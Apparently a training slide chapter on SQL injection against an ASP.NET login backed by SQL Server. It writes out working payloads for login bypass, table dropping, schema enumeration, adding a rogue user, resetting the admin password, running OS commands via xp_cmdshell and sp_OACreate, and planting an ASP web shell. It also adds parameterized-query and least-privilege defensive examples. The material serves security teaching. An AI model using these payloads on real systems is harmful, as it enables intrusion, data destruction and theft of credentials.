Security.NET
Chapter 2
SQL Injection
• A form of a script injection attack
• Malicious user input is used to affect the SQL script that is executed
Example Table
CREATE TABLE [dbo].[users] (
    [id] [int] NOT NULL,
    [uname] [varchar](255) COLLATE Hebrew_CI_AS NULL,
    [pass] [varchar](255) COLLATE Hebrew_CI_AS NULL,
    [priv] [int] NULL
) ON [PRIMARY]
Example code
// Vulnerable login check: the textbox values are concatenated straight into the query text
sqlConnection1.Open();
sqlCommand1.CommandText = "select * from users where uname='" + TextBox1.Text + "' and pass='" + TextBox2.Text + "'";
SqlDataReader d = sqlCommand1.ExecuteReader();
if (d.HasRows == true)
    Response.Redirect("ok.aspx");
else
    Response.Redirect("error.aspx");
d.Close();
sqlConnection1.Close();
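The same login check rewritten with a parameterized command, as an added example that is not part of the original slides. It assumes the same Web Forms page, textboxes and a connection string named "users" in web.config; the database error is logged server-side rather than shown to the user, which also addresses the "too much information" point made later in the deck.

```csharp
// Added example (not from the original slides): parameterized version of the login check.
// Assumptions: ASP.NET Web Forms page with TextBox1/TextBox2 and a "users" connection string.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;

public partial class Login : System.Web.UI.Page
{
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["users"].ConnectionString;

    protected void LoginButton_Click(object sender, EventArgs e)
    {
        // The SQL text is a constant; user values travel separately as typed parameters,
        // so input such as  ' or 1=1 --  is compared as a literal username and cannot
        // comment out the password check or append a second statement.
        const string sql = "SELECT id FROM users WHERE uname = @uname AND pass = @pass";
        bool ok;
        try
        {
            using (SqlConnection cn = new SqlConnection(ConnStr))
            using (SqlCommand cmd = new SqlCommand(sql, cn))
            {
                // Sizes match the varchar(255) columns, so oversized input is rejected
                // by the parameter rather than altering the query.
                cmd.Parameters.Add("@uname", SqlDbType.VarChar, 255).Value = TextBox1.Text;
                cmd.Parameters.Add("@pass", SqlDbType.VarChar, 255).Value = TextBox2.Text;
                cn.Open();
                ok = cmd.ExecuteScalar() != null;   // a row came back: credentials matched
            }
        }
        catch (SqlException ex)
        {
            // Keep the database's message out of the response (it names tables and
            // columns); record it server-side instead and fail closed.
            System.Diagnostics.Trace.TraceError("login query failed: {0}", ex.Message);
            ok = false;
        }
        Response.Redirect(ok ? "ok.aspx" : "error.aspx");
    }
}
```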
Bypass the check
• In the user textbox type:
' or 1=1 --
The quote closes the uname literal, 1=1 makes the WHERE clause true, and -- comments out the rest of the query, including the pass check.
You can also drop a table by typing:
'; drop table t1; --
Find the table structure
• ' having 1=1--
• You get the error:
Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause
• Table name: users
• Column: id
Table structure
• ' group by users.id having 1=1--
• ' group by users.id, users.uname having 1=1--
• ' group by users.id, users.uname, users.pass having 1=1--
• ' group by users.id, users.uname, users.pass, users.priv having 1=1--
Data types
• ' union select sum(id) from users--
• ' union select sum(uname) from users--
• ' union select sum(pass) from users--
• ' union select sum(priv) from users--
The error returned for each column names its data type.
Create a new user
• '; insert users values(5,'hacker','pass',1); --
• You can also update the administrator password, for example:
'; update users set pass='12345' where uname='admin'; --
Error messages
• Too much information
• All system messages:
select * from master..sysmessages
Extended S.P.
• ' exec master..xp_cmdshell 'calc' --
• Use for D.O.S. attack
• Find the Windows users:
' exec master..xp_cmdshell 'net1 user > C:\Inetpub\wwwroot\sqlinj\u.txt' --
Registry XP
• xp_regaddmultistring
• xp_regdeletekey
• xp_regdeletevalue
• xp_regenumkeys
• xp_regenumvalues
• xp_regread
• xp_regremovemultistring
• xp_regwrite
• Example:
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
Other XP
• exec master..xp_servicecontrol 'start', 'schedule'
• xp_availablemedia - reveals the available drives on the machine
• xp_dirtree - allows a directory tree to be obtained
• xp_enumdsn - enumerates ODBC data sources on the server
• xp_loginconfig - reveals information about the security mode of the server
• xp_terminate_process - terminates a process, given its PID
COM Components
• T-SQL script:
declare @o int
exec sp_OACreate 'wscript.shell', @o out
exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'
• Browser:
'; declare @o int exec sp_OACreate 'wscript.shell', @o out exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'--
Dynamic ASP
declare @o int, @f int, @t int, @ret int
exec sp_OACreate 'scripting.filesystemobject', @o out
exec sp_OAMethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_OAMethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'
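Every xp_* and sp_OA* call in the Extended S.P., Registry XP, Other XP, COM Components and Dynamic ASP slides runs with the server-level rights of the login the web application connects with, so the practical defence is a least-privilege login and instance settings that leave those procedures switched off. The following startup self-check is an added example, not code from the original slides; it assumes the application's own connection string and SQL Server 2005 or later for sys.configurations.

```csharp
// Added example (not from the original slides): fail deployment loudly when the web
// application's SQL login could reach the extended procedures shown in this chapter.
// Assumption: SQL Server 2005+ (sys.configurations); the login used is the app's own.
using System;
using System.Collections.Generic;
using System.Data.SqlClient;

public static class DbPrivilegeCheck
{
    // Returns findings; an empty list means the login and instance look suitably limited.
    public static List<string> Run(string connStr)
    {
        var findings = new List<string>();
        using (SqlConnection cn = new SqlConnection(connStr))
        {
            cn.Open();
            // 1 = the connecting login is in the sysadmin fixed server role.
            if (ScalarInt(cn, "SELECT ISNULL(IS_SRVROLEMEMBER('sysadmin'), 0)") == 1)
                findings.Add("application login is sysadmin: xp_cmdshell, xp_reg* and " +
                             "sp_OACreate are all reachable through an injected query");
            // value_in_use = 1 means the feature is switched on at the instance level.
            if (ConfigValue(cn, "xp_cmdshell") == 1)
                findings.Add("xp_cmdshell is enabled on the instance");
            if (ConfigValue(cn, "Ole Automation Procedures") == 1)
                findings.Add("OLE Automation (sp_OACreate/sp_OAMethod) is enabled on the instance");
        }
        return findings;
    }

    private static int ConfigValue(SqlConnection cn, string option)
    {
        // Parameterized here too: the option name is a constant, but the habit costs nothing.
        using (var cmd = new SqlCommand(
            "SELECT CAST(value_in_use AS int) FROM sys.configurations WHERE name = @n", cn))
        {
            cmd.Parameters.AddWithValue("@n", option);
            object o = cmd.ExecuteScalar();
            return (o == null || o is DBNull) ? 0 : Convert.ToInt32(o);
        }
    }

    private static int ScalarInt(SqlConnection cn, string sql)
    {
        using (var cmd = new SqlCommand(sql, cn))
            return Convert.ToInt32(cmd.ExecuteScalar());
    }
}
```

Call DbPrivilegeCheck.Run from Application_Start and refuse to serve requests while it returns findings; the lanmanserver registry read and the foo.asp drop above both depend on the rights this check flags.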